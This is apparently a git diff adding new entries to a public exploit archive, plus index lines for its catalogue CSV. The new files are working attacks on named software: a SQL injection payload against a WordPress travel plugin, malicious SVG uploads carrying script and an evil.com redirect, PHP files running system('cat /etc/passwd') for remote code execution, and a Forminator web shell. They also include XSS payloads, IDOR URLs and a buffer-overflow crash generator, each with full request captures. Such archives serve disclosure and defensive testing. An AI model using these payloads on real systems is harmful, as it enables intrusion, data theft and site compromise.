+
+
+[-] Done
\ No newline at end of file
diff --git a/exploits/php/webapps/51655.txt b/exploits/php/webapps/51655.txt
new file mode 100644
index 000000000..1382b4bc6
--- /dev/null
+++ b/exploits/php/webapps/51655.txt
@@ -0,0 +1,42 @@
+# Exploit Title: WordPress adivaha Travel Plugin 2.3 - SQL Injection
+# Exploit Author: CraCkEr
+# Date: 29/07/2023
+# Vendor: adivaha - Travel Tech Company
+# Vendor Homepage: https://www.adivaha.com/
+# Software Link: https://wordpress.org/plugins/adiaha-hotel/
+# Demo: https://www.adivaha.com/demo/adivaha-online/
+# Version: 2.3
+# Tested on: Windows 10 Pro
+# Impact: Database Access
+
+
+## Greetings
+
+The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka
+CryptoJob (Twitter) twitter.com/0x0CryptoJob
+
+
+## Description
+
+SQL injection attacks can allow unauthorized access to sensitive data, modification of
+data and crash the application or make it unavailable, leading to lost revenue and
+damage to a company's reputation.
+
+
+
+Path: /mobile-app/v3/
+
+GET parameter 'pid' is vulnerable to SQL Injection
+
+https://website/mobile-app/v3/?pid=[SQLI]&isMobile=chatbot
+
+---
+Parameter: pid (GET)
+Type: time-based blind
+Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
+Payload: pid=77A89299'XOR(SELECT(0)FROM(SELECT(SLEEP(6)))a)XOR'Z&isMobile=chatbot
+---
+
+
+
+[-] Done
\ No newline at end of file
diff --git a/exploits/php/webapps/51656.txt b/exploits/php/webapps/51656.txt
new file mode 100644
index 000000000..adb4f0837
--- /dev/null
+++ b/exploits/php/webapps/51656.txt
@@ -0,0 +1,101 @@
+# Exploit Title: Online Matrimonial Website System v3.3 - Code Execution via malicious SVG file upload
+# Date: 3-8-2023
+# Category: Web Application
+# Exploit Author: Rajdip Dey Sarkar
+# Version: 3.3
+# Tested on: Windows/Kali
+# CVE: CVE-2023-39115
+
+
+
+Description:
+----------------
+
+An arbitrary file upload vulnerability in Campcodes Online Matrimonial
+Website System Script v3.3 allows attackers to execute arbitrary code via
+uploading a crafted SVG file.
+
+
+SVG Payload
+------------------
+
+<?xml version="1.0" standalone="no"?>
+<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "
+http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
+
+<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
+   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900"
+stroke="#004400"/>
+   <script type="text/javascript">
+      alert("You have been hacked!!")
+
+
+      window.location.href="https://evil.com"
+   </script>
+</svg>
+
+
+Steps to reproduce
+--------------------------
+
+ -Login with your creds
+ -Navigate to this directory - /profile-settings
+ -Click on Gallery -> Add New Image -> Browser -> Add Files
+ -Choose the SVG file and upload done
+ -Click the image!! Payload Triggered
+
+
+Burp Request
+-------------------
+
+POST /Matrimonial%20Script/install/aiz-uploader/upload HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)
+Gecko/20100101 Firefox/115.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+X-CSRF-TOKEN: I5gqfipOOKWwI74hfdtFC2kpUP0EggWb8Qf7Xd5E
+Content-Type: multipart/form-data;
+boundary=---------------------------167707198418121100152548123485
+Content-Length: 1044
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/Matrimonial%20Script/install/gallery-image/create
+Cookie: _session=5GnMKaOhppEZivuzZJFXQLdldLMXecD1hmcEPWjg;
+acceptCookies=true; XSRF-TOKEN=I5gqfipOOKWwI74hfdtFC2kpUP0EggWb8Qf7Xd5E
+Sec-Fetch-Dest: empty
+Sec-Fetch-Mode: cors
+Sec-Fetch-Site: same-origin
+
+-----------------------------167707198418121100152548123485
+Content-Disposition: form-data; name="relativePath"
+
+null
+-----------------------------167707198418121100152548123485
+Content-Disposition: form-data; name="name"
+
+file (1).svg
+-----------------------------167707198418121100152548123485
+Content-Disposition: form-data; name="type"
+
+image/svg+xml
+-----------------------------167707198418121100152548123485
+Content-Disposition: form-data; name="aiz_file"; filename="file (1).svg"
+Content-Type: image/svg+xml
+
+<?xml version="1.0" standalone="no"?>
+<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "
+http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
+
+<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
+   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900"
+stroke="#004400"/>
+   <script type="text/javascript">
+      alert("You have been hacked!!")
+
+
+      window.location.href="https://evil.com"
+   </script>
+</svg>
+-----------------------------167707198418121100152548123485--
\ No newline at end of file
diff --git a/exploits/php/webapps/51658.txt b/exploits/php/webapps/51658.txt
new file mode 100644
index 000000000..ae89659ae
--- /dev/null
+++ b/exploits/php/webapps/51658.txt
@@ -0,0 +1,15 @@
+# Exploit Title: Wordpress Plugin EventON Calendar 4.4 - Unauthenticated Event Access
+# Date: 03.08.2023
+# Exploit Author: Miguel Santareno
+# Vendor Homepage: https://www.myeventon.com/
+# Version: 4.4
+# Tested on: Google and Firefox latest version
+# CVE : CVE-2023-2796
+
+# 1. Description
+The plugin lacks authentication and authorization in its eventon_ics_download ajax action, allowing unauthenticated visitors to access private and password protected Events by guessing their numeric id.
+
+
+# 2. Proof of Concept (PoC)
+Proof of Concept:
+https://example.com/wp-admin/admin-ajax.php?action=eventon_ics_download&event_id=value
\ No newline at end of file
diff --git a/exploits/php/webapps/51659.txt b/exploits/php/webapps/51659.txt
new file mode 100644
index 000000000..6c343efa2
--- /dev/null
+++ b/exploits/php/webapps/51659.txt
@@ -0,0 +1,15 @@
+# Exploit Title: Wordpress Plugin EventON Calendar 4.4 - Unauthenticated Post Access via IDOR
+# Date: 03.08.2023
+# Exploit Author: Miguel Santareno
+# Vendor Homepage: https://www.myeventon.com/
+# Version: 4.4
+# Tested on: Google and Firefox latest version
+# CVE : CVE-2023-3219
+
+# 1. Description
+The plugin does not validate that the event_id parameter in its eventon_ics_download ajax action is a valid Event, allowing unauthenticated visitors to access any Post (including unpublished or protected posts) content via the ics export functionality by providing the numeric id of the post.
+
+
+# 2. Proof of Concept (PoC)
+Proof of Concept:
+https://example.com/wp-admin/admin-ajax.php?action=eventon_ics_download&event_id=<any post id>
\ No newline at end of file
diff --git a/exploits/php/webapps/51660.txt b/exploits/php/webapps/51660.txt
new file mode 100644
index 000000000..9fb8b0343
--- /dev/null
+++ b/exploits/php/webapps/51660.txt
@@ -0,0 +1,45 @@
+Exploit Title: Webutler v3.2 - Remote Code Execution (RCE)
+Application: webutler Cms
+Version: v3.2
+Bugs:  RCE
+Technology: PHP
+Vendor URL: https://webutler.de/en
+Software Link: http://webutler.de/download/webutler_v3.2.zip
+Date of found: 03.08.2023
+Author: Mirabbas Ağalarov
+Tested on: Linux
+
+
+2. Technical Details & POC
+========================================
+steps:
+1. login to account as admin
+2. go to visit media
+3.upload phar file
+4. upload poc.phar file
+
+poc.phar file contents :
+<?php echo system("cat /etc/passwd");?>
+5. Visit to poc.phar file
+poc request:
+
+POST /webutler_v3.2/admin/browser/index.php?upload=newfile&types=file&actualfolder=%2F&filename=poc.phar&overwrite=true HTTP/1.1
+Host: localhost
+Content-Length: 40
+sec-ch-ua:
+sec-ch-ua-mobile: ?0
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
+X_FILENAME: poc.phar
+sec-ch-ua-platform: ""
+Accept: */*
+Origin: http://localhost
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: cors
+Sec-Fetch-Dest: empty
+Referer: http://localhost/webutler_v3.2/admin/browser/index.php
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: WEBUTLER=ekgfsfhi3ocqdvv7ukqoropolu
+Connection: close
+
+<?php echo system("cat /etc/passwd");?>
\ No newline at end of file
diff --git a/exploits/php/webapps/51661.txt b/exploits/php/webapps/51661.txt
new file mode 100644
index 000000000..1f4bf6cc7
--- /dev/null
+++ b/exploits/php/webapps/51661.txt
@@ -0,0 +1,45 @@
+Exploit Title: Webedition CMS v2.9.8.8 - Remote Code Execution (RCE)
+Application: webedition Cms
+Version: v2.9.8.8
+Bugs:  RCE
+Technology: PHP
+Vendor URL: https://www.webedition.org/
+Software Link: https://download.webedition.org/releases/OnlineInstaller.tgz?p=1
+Date of found: 03.08.2023
+Author: Mirabbas Ağalarov
+Tested on: Linux
+
+
+2. Technical Details & POC
+========================================
+steps
+1. Login account
+2. Go to New -> Webedition page -> empty page
+3. Select php
+4. Set as "><?php echo system("cat /etc/passwd");?>  Description area
+
+Poc request:
+
+POST /webEdition/we_cmd.php?we_cmd[0]=switch_edit_page&we_cmd[1]=0&we_cmd[2]=4fd880c06df5a590754ce5b8738cd0dd HTTP/1.1
+Host: localhost
+Content-Length: 1621
+Cache-Control: max-age=0
+sec-ch-ua:
+sec-ch-ua-mobile: ?0
+sec-ch-ua-platform: ""
+Upgrade-Insecure-Requests: 1
+Origin: http://localhost
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: iframe
+Referer: http://localhost/webEdition/we_cmd.php?we_cmd[0]=switch_edit_page&we_cmd[1]=0&we_cmd[2]=4fd880c06df5a590754ce5b8738cd0dd
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: treewidth_main=300; WESESSION=e781790f1d79ddaf9e3a0a4eb42e55b04496a569; cookie=yep; treewidth_main=300
+Connection: close
+
+we_transaction=4fd880c06df5a590754ce5b8738cd0dd&we_003be033b474a5c25132d388906fb4ae_Filename=poc&we_003be033b474a5c25132d388906fb4ae_Extension=.php&wetmp_we_003be033b474a5c25132d388906fb4ae_Extension=&we_003be033b474a5c25132d388906fb4ae_ParentPath=%2F&we_003be033b474a5c25132d388906fb4ae_ParentID=0&yuiAcContentTypeParentPath=&we_003be033b474a5c25132d388906fb4ae_DocType=&we_003be033b474a5c25132d388906fb4ae_TemplateName=%2F&we_003be033b474a5c25132d388906fb4ae_TemplateID=&yuiAcContentTypeTemplate=&we_003be033b474a5c25132d388906fb4ae_IsDynamic=0&we_003be033b474a5c25132d388906fb4ae_IsSearchable=0&we_003be033b474a5c25132d388906fb4ae_InGlossar=0&we_003be033b474a5c25132d388906fb4ae_txt%5BTitle%5D=asdf&we_003be033b474a5c25132d388906fb4ae_txt%5BDescription%5D=%22%3E%3C%3Fphp+echo+system%28%22cat+%2Fetc%2Fpasswd%22%29%3B%3F%3E&we_003be033b474a5c25132d388906fb4ae_txt%5BKeywords%5D=asdf&fold%5B0%5D=0&fold_named%5BPropertyPage_3%5D=0&we_003be033b474a5c25132d388906fb4ae_Language=en_GB&we_003be033b474a5c25132d388906fb4ae_LanguageDocName%5Bde_DE%5D=&we_003be033b474a5c25132d388906fb4ae_LanguageDocID%5Bde_DE%5D=&yuiAcContentTypeLanguageDocdeDE=&we_003be033b474a5c25132d388906fb4ae_LanguageDocName%5Ben_GB%5D=&we_003be033b474a5c25132d388906fb4ae_LanguageDocID%5Ben_GB%5D=&yuiAcContentTypeLanguageDocenGB=&fold%5B1%5D=0&fold_named%5BPropertyPage_4%5D=0&we_003be033b474a5c25132d388906fb4ae_CopyID=0&fold%5B2%5D=0&fold_named%5BPropertyPage_6%5D=0&wetmp_003be033b474a5c25132d388906fb4ae_CreatorID=%2Fadmin&we_003be033b474a5c25132d388906fb4ae_CreatorID=1&we_003be033b474a5c25132d388906fb4ae_RestrictOwners=0&we_complete_request=1
\ No newline at end of file
diff --git a/exploits/php/webapps/51662.txt b/exploits/php/webapps/51662.txt
new file mode 100644
index 000000000..62942f461
--- /dev/null
+++ b/exploits/php/webapps/51662.txt
@@ -0,0 +1,58 @@
+Exploit Title: Webedition CMS v2.9.8.8 - Stored XSS
+Application: Webedition CMS
+Version: v2.9.8.8
+Bugs:  Stored Xss
+Technology: PHP
+Vendor URL: https://www.webedition.org/
+Software Link: https://download.webedition.org/releases/OnlineInstaller.tgz?p=1
+Date of found: 03.08.2023
+Author: Mirabbas Ağalarov
+Tested on: Linux
+
+
+2. Technical Details & POC
+========================================
+steps
+1. Login to account
+2. Go to New ->  Media -> Image
+3. Upload malicious svg file
+svg file content:
+
+"""
+<?xml version="1.0" standalone="no"?>
+<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
+
+<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
+   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
+   <script type="text/javascript">
+      alert(document.location);
+   </script>
+</svg>
+"""
+
+
+Poc request:
+
+POST /webEdition/we_cmd.php?we_cmd[0]=save_document&we_cmd[1]=&we_cmd[2]=&we_cmd[3]=&we_cmd[4]=&we_cmd[5]=&we_cmd[6]= HTTP/1.1
+Host: localhost
+Content-Length: 761
+Cache-Control: max-age=0
+sec-ch-ua:
+sec-ch-ua-mobile: ?0
+sec-ch-ua-platform: ""
+Upgrade-Insecure-Requests: 1
+Origin: http://localhost
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: iframe
+Referer: http://localhost/webEdition/we_cmd.php?we_cmd[0]=switch_edit_page&we_cmd[1]=0&we_cmd[2]=73fee01822cc1e1b9ae2d7974583bb8e
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: treewidth_main=300; WESESSION=e781790f1d79ddaf9e3a0a4eb42e55b04496a569; cookie=yep; treewidth_main=300
+Connection: close
+
+we_transaction=73fee01822cc1e1b9ae2d7974583bb8e&we_cea6f7e60ce62be78e59f849855d2038_Filename=malas&we_cea6f7e60ce62be78e59f849855d2038_Extension=.svg&wetmp_we_cea6f7e60ce62be78e59f849855d2038_Extension=&we_cea6f7e60ce62be78e59f849855d2038_ParentPath=%2F&we_cea6f7e60ce62be78e59f849855d2038_ParentID=0&yuiAcContentTypeParentPath=&we_cea6f7e60ce62be78e59f849855d2038_IsSearchable=1&check_we_cea6f7e60ce62be78e59f849855d2038_IsSearchable=1&we_cea6f7e60ce62be78e59f849855d2038_IsProtected=0&fold%5B0%5D=0&fold_named%5BPropertyPage_2%5D=0&fold%5B1%5D=0&fold_named%5BPropertyPage_3%5D=0&wetmp_cea6f7e60ce62be78e59f849855d2038_CreatorID=%2Fadmin&we_cea6f7e60ce62be78e59f849855d2038_CreatorID=1&we_cea6f7e60ce62be78e59f849855d2038_RestrictOwners=0&we_complete_request=1
\ No newline at end of file
diff --git a/exploits/php/webapps/51663.txt b/exploits/php/webapps/51663.txt
new file mode 100644
index 000000000..d0bc1e471
--- /dev/null
+++ b/exploits/php/webapps/51663.txt
@@ -0,0 +1,35 @@
+# Exploit Title: WordPress adivaha Travel Plugin 2.3 - Reflected XSS
+# Exploit Author: CraCkEr
+# Date: 29/07/2023
+# Vendor: adivaha - Travel Tech Company
+# Vendor Homepage: https://www.adivaha.com/
+# Software Link: https://wordpress.org/plugins/adiaha-hotel/
+# Demo: https://www.adivaha.com/demo/adivaha-online/
+# Version: 2.3
+# Tested on: Windows 10 Pro
+# Impact: Manipulate the content of the site
+
+
+## Greetings
+
+The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka
+CryptoJob (Twitter) twitter.com/0x0CryptoJob
+
+
+## Description
+
+The attacker can send to victim a link containing a malicious URL in an email or instant message
+can perform a wide variety of actions, such as stealing the victim's session token or login credentials
+
+
+Path: /mobile-app/v3/
+
+GET parameter 'isMobile' is vulnerable to XSS
+
+https://www.website/mobile-app/v3/?pid=77A89299&isMobile=[XSS]
+
+
+XSS Payload: clq95"><script>alert(1)</script>lb1ra
+
+
+[-] Done
\ No newline at end of file
diff --git a/exploits/php/webapps/51664.txt b/exploits/php/webapps/51664.txt
new file mode 100644
index 000000000..2db8335ef
--- /dev/null
+++ b/exploits/php/webapps/51664.txt
@@ -0,0 +1,100 @@
+# Exploit Title: WordPress Plugin Forminator 1.24.6 - Unauthenticated Remote Command Execution
+# Date: 2023-07-20
+# Exploit Author: Mehmet Kelepçe
+# Vendor Homepage: https://wpmudev.com/project/forminator-pro/
+# Software Link: https://wordpress.org/plugins/forminator/
+# Version: 1.24.6
+# Tested on: PHP - Mysql - Apache2 - Windows 11
+
+HTTP Request and vulnerable parameter:
+-------------------------------------------------------------------------
+POST /3/wordpress/wp-admin/admin-ajax.php HTTP/1.1
+Host: localhost
+Content-Length: 1756
+sec-ch-ua:
+Accept: */*
+Content-Type: multipart/form-data;
+boundary=----WebKitFormBoundaryTmsFfkbegmAjomne
+X-Requested-With: XMLHttpRequest
+sec-ch-ua-mobile: ?0
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
+AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199
+Safari/537.36
+sec-ch-ua-platform: ""
+Origin: http://localhost
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: cors
+Sec-Fetch-Dest: empty
+Referer: http://localhost/3/wordpress/2023/01/01/merhaba-dunya/
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: wp-settings-time-1=1689794282;
+wordpress_test_cookie=WP%20Cookie%20check; wp_lang=tr_TR
+Connection: close
+
+.
+.
+.
+.
+.
+
+------WebKitFormBoundaryTmsFfkbegmAjomne
+Content-Disposition: form-data; name="postdata-1-post-image";
+filename="mehmet.php"
+Content-Type: application/octet-stream
+
+<?php
+$_GET['function']($_GET['cmd']);
+?>
+
+
+
+Source Code:
+wp-content/plugins/forminator/library/modules/custom-forms/front/front-render.php:
+--------------------------------------------------------------------
+        public function has_upload() {
+$fields = $this->get_fields();
+
+if ( ! empty( $fields ) ) {
+foreach ( $fields as $field ) {
+if ( 'upload' === $field['type'] || 'postdata' === $field['type'] ) {
+return true;
+}
+}
+}
+
+return false;
+}
+Vulnerable parameter: postdata-1-post-image
+
+and
+
+
+Source code:
+wp-content/plugins/forminator/library/fields/postdata.php:
+-------------------------------------------------------------------
+if ( ! empty( $post_image ) && isset( $_FILES[ $image_field_name ] ) ) {
+if ( isset( $_FILES[ $image_field_name ]['name'] ) && ! empty(
+$_FILES[ $image_field_name ]['name'] ) ) {
+$file_name = sanitize_file_name( $_FILES[ $image_field_name ]['name'] );
+$valid     = wp_check_filetype( $file_name );
+
+if ( false === $valid['ext'] || ! in_array( $valid['ext'],
+$this->image_extensions ) ) {
+$this->validation_message[ $image_field_name ] = apply_filters(
+'forminator_postdata_field_post_image_nr_validation_message',
+esc_html__( 'Uploaded file\'s extension is not allowed.', 'forminator' ),
+$id
+);
+}
+}
+}
+
+Vulnerable function: $image_field_name
+-------------------------------------------------------------------------
+
+Payload file: mehmet.php
+<?php
+$_GET['function']($_GET['cmd']);
+?>
+-------------------------------------------------------------------------
\ No newline at end of file
diff --git a/exploits/windows/dos/51665.py b/exploits/windows/dos/51665.py
new file mode 100755
index 000000000..432271472
--- /dev/null
+++ b/exploits/windows/dos/51665.py
@@ -0,0 +1,29 @@
+# Exploit Title: Xlight FTP Server 3.9.3.6 - 'Stack Buffer Overflow' (DOS)
+# Discovered by: Yehia Elghaly
+# Discovered Date: 2023-08-04
+# Vendor Homepage: https://www.xlightftpd.com/
+# Software Link : https://www.xlightftpd.com/download/setup.exe
+# Tested Version: 3.9.3.6
+# Vulnerability Type: Buffer Overflow Local
+# Tested on OS: Windows XP Professional SP3 - Windows 11 x64
+
+# Description: Xlight FTP Server 3.9.3.6 'Execute Program' Buffer Overflow (PoC)
+
+# Steps to reproduce:
+# 1. - Download and Xlight FTP Server
+# 2. - Run the python script and it will create exploit.txt file.
+# 3. - Open Xlight FTP Server 3.9.3.6
+# 4. - "File and Directory - Modify Virtual Server Configuration - Advanced - Misc- Setup
+# 6. - Execute a Program after use logged in-  Paste the characters
+# 7  - Crashed
+
+#!/usr/bin/env python3
+
+exploit = 'A' * 294
+
+try:
+    with open("exploit.txt","w") as file:
+        file.write(exploit)
+    print("POC is created")
+except:
+    print("POC not created")
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index ee5130d6c..cb511e66f 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -3853,6 +3853,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 43871,exploits/hardware/remote/43871.py,"RAVPower 2.000.056 - Root Remote Code Execution",2018-01-24,"Daniele Linguaglossa & Stefano Farletti",remote,hardware,,2018-01-24,2018-01-26,0,CVE-2018-5997,,,,,
 18291,exploits/hardware/remote/18291.txt,"Reaver - WiFi Protected Setup (WPS)",2011-12-30,cheffner,remote,hardware,,2011-12-30,2011-12-30,0,OSVDB-78282;CVE-2011-5053,,reaver-1.1.tar.gz,,,
 34802,exploits/hardware/remote/34802.html,"Research In Motion BlackBerry Device Software 4.7.1 - Cross Domain Information Disclosure",2010-10-04,"599eme Man",remote,hardware,,2010-10-04,2014-09-28,1,,,,,,https://www.securityfocus.com/bid/43685/info
+51642,exploits/hardware/remote/51642.py,"ReyeeOS 1.204.1614 - MITM Remote Code Execution (RCE)",2023-08-04,"Riyan Firmansyah of Seclab",remote,hardware,,2023-08-04,2023-08-04,0,,,,,,
 9858,exploits/hardware/remote/9858.txt,"Riorey RIOS 4.7.0 - Hard-Coded Password",2009-10-08,"Marek Kroemeke",remote,hardware,8022,2009-10-07,2016-10-29,1,CVE-2009-3710;OSVDB-58858,,,,,
 8269,exploits/hardware/remote/8269.txt,"Rittal CMC-TC Processing Unit II - Multiple Vulnerabilities",2009-03-23,"Louhi Networks",remote,hardware,,2009-03-22,,1,OSVDB-56342;OSVDB-56341;OSVDB-56340;OSVDB-56339,,2009-Louhi_CMC-brute_090323.zip,,,http://www.louhinetworks.fi/advisory/Louhi_CMC-brute_090323.zip
 24892,exploits/hardware/remote/24892.txt,"Rosewill RSVA11001 - Remote Command Injection",2013-03-26,"Eric Urban",remote,hardware,,2013-03-26,2013-03-26,0,OSVDB-91630,,,,,
@@ -3886,6 +3887,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 30915,exploits/hardware/remote/30915.rb,"SerComm Device - Remote Code Execution (Metasploit)",2014-01-14,Metasploit,remote,hardware,32764,2014-01-14,2014-01-14,1,OSVDB-101653;CVE-2014-0659,"Metasploit Framework (MSF)",,,,
 32938,exploits/hardware/remote/32938.c,"Sercomm TCP/32674 - Backdoor Reactivation",2014-04-18,Synacktiv,remote,hardware,32674,2014-04-18,2014-04-18,0,OSVDB-106324,,,,,
 23317,exploits/hardware/remote/23317.txt,"Seyeon FlexWATCH Network Video Server 2.2 - Unauthorized Administrative Access",2003-10-31,slaizer,remote,hardware,,2003-10-31,2012-12-12,1,CVE-2003-1160;OSVDB-2842,,,,,https://www.securityfocus.com/bid/8942/info
+51657,exploits/hardware/remote/51657.txt,"Shelly PRO 4PM v0.11.0 - Authentication Bypass",2023-08-04,"The Security Team [exploitsecurity.io]",remote,hardware,,2023-08-04,2023-08-04,0,CVE-2023-33383,,,,,
 35995,exploits/hardware/remote/35995.sh,"Shuttle Tech ADSL Modem/Router 915 WM - Remote DNS Change",2015-02-05,"Todor Donev",remote,hardware,,2015-02-05,2017-09-08,0,OSVDB-118005,,,,,
 40867,exploits/hardware/remote/40867.txt,"Shuttle Tech ADSL Wireless 920 WM - Multiple Vulnerabilities",2016-12-05,"Persian Hack Team",remote,hardware,,2016-12-05,2016-12-05,0,,,,,,
 51366,exploits/hardware/remote/51366.txt,"Sielco Analog FM Transmitter 2.12 - Remote Privilege Escalation",2023-04-14,LiquidWorm,remote,hardware,,2023-04-14,2023-04-14,0,,,,,,
@@ -12053,6 +12055,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 24922,exploits/multiple/webapps/24922.txt,"OTRS 3.x - FAQ Module Persistent Cross-Site Scripting",2013-04-08,"Luigi Vezzoso",webapps,multiple,,2013-04-08,2013-04-08,1,CVE-2013-2637;OSVDB-92086,,,,,
 32162,exploits/multiple/webapps/32162.txt,"ownCloud 4.0.x/4.5.x - 'upload.php?Filename' Remote Code Execution",2014-03-10,Portcullis,webapps,multiple,80,2014-03-10,2016-10-10,1,CVE-2014-2044;OSVDB-104082,,,,,https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2044/
 37058,exploits/multiple/webapps/37058.txt,"OYO File Manager 1.1 (iOS / Android) - Multiple Vulnerabilities",2015-05-18,Vulnerability-Lab,webapps,multiple,8080,2015-05-18,2015-05-18,0,OSVDB-122315;OSVDB-122311;OSVDB-122310,,,,,https://www.vulnerability-lab.com/get_content.php?id=1494
+51646,exploits/multiple/webapps/51646.txt,"Ozeki SMS Gateway 10.3.208 - Arbitrary File Read (Unauthenticated)",2023-08-04,"Ahmet Ümit BAYRAM",webapps,multiple,,2023-08-04,2023-08-04,0,,,,,,
 43440,exploits/multiple/webapps/43440.txt,"P-Synch < 6.2.5 - Multiple Vulnerabilities",2003-05-30,"GulfTech Security",webapps,multiple,,2018-01-05,2018-01-05,0,GTSA-00005,,,,,http://gulftech.org/advisories/P-Synch%20Multiple%20Vulnerabilities/5
 51343,exploits/multiple/webapps/51343.txt,"Palo Alto Cortex XSOAR 6.5.0 - Stored Cross-Site Scripting (XSS)",2023-04-08,omurugur,webapps,multiple,,2023-04-08,2023-04-08,0,CVE-2022-0020,,,,,
 51391,exploits/multiple/webapps/51391.py,"PaperCut NG/MG 22.0.4 - Authentication Bypass",2023-04-25,MaanVader,webapps,multiple,,2023-04-25,2023-04-25,0,CVE-2023-27350,,,,,
@@ -13305,6 +13308,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 45612,exploits/php/webapps/45612.php,"Academic Timetable Final Build 7.0 - Information Disclosure",2018-10-15,"Ihsan Sencan",webapps,php,80,2018-10-15,2018-10-18,0,,,,,http://www.exploit-db.comAcademic_Timetable_Final_Build_v70.zip,
 45596,exploits/php/webapps/45596.txt,"Academic Timetable Final Build 7.0a-7.0b - 'id' SQL Injection",2018-10-15,"Ihsan Sencan",webapps,php,80,2018-10-15,2018-10-18,0,,"SQL Injection (SQLi)",,,http://www.exploit-db.comAcademic_Timetable_Final_Build_v70.zip,
 45600,exploits/php/webapps/45600.txt,"Academic Timetable Final Build 7.0b - Cross-Site Request Forgery (Add Admin)",2018-10-15,"Ihsan Sencan",webapps,php,80,2018-10-15,2018-10-18,0,,"Cross-Site Request Forgery (CSRF)",,,http://www.exploit-db.comAcademic_Timetable_Final_Build_v70.zip,
+51654,exploits/php/webapps/51654.txt,"Academy LMS 6.0 - Reflected XSS",2023-08-04,CraCkEr,webapps,php,,2023-08-04,2023-08-04,0,CVE-2023-4119,,,,,
 36110,exploits/php/webapps/36110.txt,"ACal 2.2.6 - 'calendar.php' Cross-Site Scripting",2011-09-02,T0xic,webapps,php,,2011-09-02,2015-04-18,1,,,,,http://www.exploit-db.comACal-2.2.6.zip,https://www.securityfocus.com/bid/49442/info
 1763,exploits/php/webapps/1763.txt,"ACal 2.2.6 - 'day.php' Remote File Inclusion",2006-05-07,PiNGuX,webapps,php,,2006-05-06,2015-04-18,1,OSVDB-25340;CVE-2006-2261,,,,http://www.exploit-db.comACal-2.2.6.zip,
 38697,exploits/php/webapps/38697.txt,"ACal 2.2.6 - 'view' Local File Inclusion",2013-08-15,ICheer_No0M,webapps,php,,2013-08-15,2015-11-15,1,OSVDB-96304,,,,,https://www.securityfocus.com/bid/61801/info
@@ -13456,6 +13460,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 37407,exploits/php/webapps/37407.txt,"ADICO - 'index.php' Script SQL Injection",2012-06-15,"Ibrahim El-Sayed",webapps,php,,2012-06-15,2015-06-28,1,,,,,,https://www.securityfocus.com/bid/54023/info
 37438,exploits/php/webapps/37438.txt,"Adiscan LogAnalyzer 3.4.3 - Cross-Site Scripting",2012-06-21,"Sooraj K.S",webapps,php,,2012-06-21,2015-06-30,1,,,,,,https://www.securityfocus.com/bid/54117/info
 45958,exploits/php/webapps/45958.txt,"Adiscon LogAnalyzer < 4.1.7 - Cross-Site Scripting",2018-12-09,"Gustavo Sorondo",webapps,php,80,2018-12-09,2018-12-10,0,CVE-2018-19877,"Cross-Site Scripting (XSS)",,,http://www.exploit-db.comloganalyzer-4.1.6.tar.gz,
+51643,exploits/php/webapps/51643.txt,"Adiscon LogAnalyzer v.4.1.13 - Cross Site Scripting",2023-08-04,Pedro,webapps,php,,2023-08-04,2023-08-04,0,CVE-2023-36306,,,,,
